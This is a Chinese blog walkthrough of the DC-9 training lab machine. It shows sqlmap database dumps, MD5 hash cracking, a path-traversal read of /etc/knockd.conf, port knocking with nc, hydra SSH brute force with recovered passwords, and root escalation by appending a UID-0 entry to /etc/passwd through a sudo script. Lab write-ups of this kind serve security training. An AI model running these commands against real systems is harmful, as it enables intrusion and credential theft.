Vulhub靶场练习 DC-9靶机解析

2024-03-16 1,040 0

一、搭建环境

kali的IP地址是:192.168.200.14

DC-9的IP地址暂时未知

二、信息收集

1、探索同网段下存活的主机

arp-scan -l #

Vulhub靶场练习 DC-9靶机解析插图

2、探索开放的端口

Vulhub靶场练习 DC-9靶机解析插图1

开启端口有:80和22端口

3、目录扫描

Vulhub靶场练习 DC-9靶机解析插图2

访问80 端口显示的主页面

Vulhub靶场练习 DC-9靶机解析插图3

分别点击其他几个页面

可以看到是用户的信息

Vulhub靶场练习 DC-9靶机解析插图4

此页面下出现的搜索框。可能会存在xss漏洞和SQL注入漏洞

Vulhub靶场练习 DC-9靶机解析插图5

最后一个需要正确输入用户名和密码才可以登录

Vulhub靶场练习 DC-9靶机解析插图6

输入什么都会跳转这个页面

Vulhub靶场练习 DC-9靶机解析插图7

用抓包的形式进行尝试,点击进行抓包测试

三、漏洞探测

sql注入

运用工具SQLMAP

Vulhub靶场练习 DC-9靶机解析插图8

将捕获的数据要包放到sqlmap的安装目录下,创建一个新的文件

Vulhub靶场练习 DC-9靶机解析插图9

在cmd命令行上输入以下指令

1、获得数据库

python sqlmap.py -r 1.txt --dbs --batch # 第一种方法
python sqlmap.py -u "http://192.168.200.6/results.php" --data "search=1" --dbs 第二种方法

Vulhub靶场练习 DC-9靶机解析插图10

2、获取数据表

python sqlmap.py -r 1.txt -D Staff --tables # 第一种方法
python sqlmap.py -u "http://192.168.200.6/results.php" --data "search=1" -D Staff --tables
# 第二种方法

Vulhub靶场练习 DC-9靶机解析插图11

3、爆字段

sqlmap.py -r 1.txt -D Staff -T Users --columns # 第一种方法

python sqlmap.py -u "http://192.168.200.6/results.php" --data "search=1" -D Staff -T Users --columns
# 第二种方法

Vulhub靶场练习 DC-9靶机解析插图12

4、暴内容

python sqlmap -u "http://192.168.200.6/results.php" --data "search=1" -D Staff -T Users --dump
# 第一种方法
python sqlmap.py -r 1.txt -D Staff -T Users --dump # 第二种方法

Vulhub靶场练习 DC-9靶机解析插图13

+--------+----------+----------------------------------+
| UserID | Username | Password                         |
+--------+----------+----------------------------------+
| 1      | admin    | 856f5de590ef37314e7c3bdf6f8a66dc |
+--------+----------+----------------------------------+

经过md5加密的admin用户密码,在线md5解码一下

账号:admin  
密码:transorbital1

登录成功

Vulhub靶场练习 DC-9靶机解析插图14

爆破另外一个数据库(Users)(只是用使用一种方法)

1、爆破数据库

python sqlmap.py -r 1.txt --dbs --batch

Vulhub靶场练习 DC-9靶机解析插图15

2、获取数据库

python sqlmap.py -r 1.txt -D Users --tables

Vulhub靶场练习 DC-9靶机解析插图16

3、爆破字段

python sqlmap.py -r 1.txt -D users -T UserDetails --columns

Vulhub靶场练习 DC-9靶机解析插图17

4、爆破内容

python sqlmap.py -r 1.txt -D users -T UserDetails --dump

python sqlmap -r 1.txt -D users -T UserDetails -C username,password --dump

Vulhub靶场练习 DC-9靶机解析插图18

回到原网页

文件包含

根据底部的信息File does not exist,可以推断,有可能存在文件包含漏洞

Vulhub靶场练习 DC-9靶机解析插图19

选择manage.php进行尝试文件包含漏洞,成功,经过百度,可以知道有个敲门打开SSH端口的事情

Vulhub靶场练习 DC-9靶机解析插图20

端口保护之端口敲门

大致就是按一定的顺序访问端口可以达到开启和关闭某个端口的机制

通过查看../../../../etc/knockd.conf文件,结合搜索到的相关知识,知道用nc分别去尝试这三个端口可以打开SSH端口

通过查看../../../../etc/knockd.conf文件,结合搜索到的相关知识,
知道用nc分别去尝试这三个端口可以打开SSH端口

经过百度,进行敲门

nc 192.168.200.6 7469

nc 192.168.200.6 8475

nc 192.168.200.6 9842

nmap再次扫描一下发现22端口开放了,amazing!!!!!

Vulhub靶场练习 DC-9靶机解析插图21

使用之前得到的用户名和密码去爆破ssh服务

hydra -L username.txt -P password.txt ssh://192.168.200.6 

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-31 04:04:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://10.0.0.28:22/
[22][ssh] host: 192.168.200.6   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.200.6   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.200.6   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found

三个用户家目录下什么也没有

按顺序先选择fredf登录B4-Tru3-001

ssh [email protected]

查看sudo -l成功

Vulhub靶场练习 DC-9靶机解析插图22

Vulhub靶场练习 DC-9靶机解析插图23

选择chandlerb登录UrAG0D!

ssh [email protected]

查看sudo -l失败

Vulhub靶场练习 DC-9靶机解析插图24

选择joeyt登录Passw0rd

ssh [email protected]

查看sudo -l失败

Vulhub靶场练习 DC-9靶机解析插图25

选择janitor登录Ilovepeepee

ssh [email protected]

查看sudo -l失败

Vulhub靶场练习 DC-9靶机解析插图26

使用janitor登陆,发现了一个密码文件,使用janitor登陆,发现了一个密码文件

janitor@dc-9:~$ ls -al
total 20
drwx------  4 janitor janitor 4096 Aug 31 18:38 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Aug 31 18:05 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
-rw-r--r--  1 janitor janitor    6 Aug 31 18:42 test.txt
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts


[22][ssh] host: 192.168.200.6   login: fredf   password: B4-Tru3-001

经过四个账户的查询发现只有fredf有一定权限

cd /opt/devstuff/dist/test/
ls -al

Vulhub靶场练习 DC-9靶机解析插图27

可以发现他具有一个特殊权限,可以运行一个test脚本。

fredf@dc-9:~$  /opt/devstuff/dist/test/test --help
Usage: python test.py read append
fredf@dc-9:~$ 
# 这个test的作用就是把一个文件中的内容append到另一个文件中。
我们首先想到利用test往passwd文件中写入用户信息,便这个用户口令必须是加密过的。

Vulhub靶场练习 DC-9靶机解析插图28

提权

在janitor中发现了几个密码,加到我们的密码字典中

然后再次使用hydra爆破发现了第四个可以用ssh登录的账号和密码

登录后sudo -l发现test文件有root权限

Vulhub靶场练习 DC-9靶机解析插图29

Vulhub靶场练习 DC-9靶机解析插图30

切换到test目录看下,找下这个test.py,在/opt/devstuff目录下,脚本的作用就是将第一个文件的内容附加到另一个文件里面去

Vulhub靶场练习 DC-9靶机解析插图31

在etc/passwd文件里进行写入账号密码

运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径

openssl passwd -1 -salt dc 123456
echo 'dc:$1$dc$5uDk4oYnRiBs0fFGlcRwy.:0:0:root:/bin/bash' >> /tmp/dc
sudo ./test /tmp/dc /etc/passwd

3.按照/etc/passwd的格式写一个文件,通过test脚本追加到/etc/passwd中即可提权,运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径

Vulhub靶场练习 DC-9靶机解析插图32


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论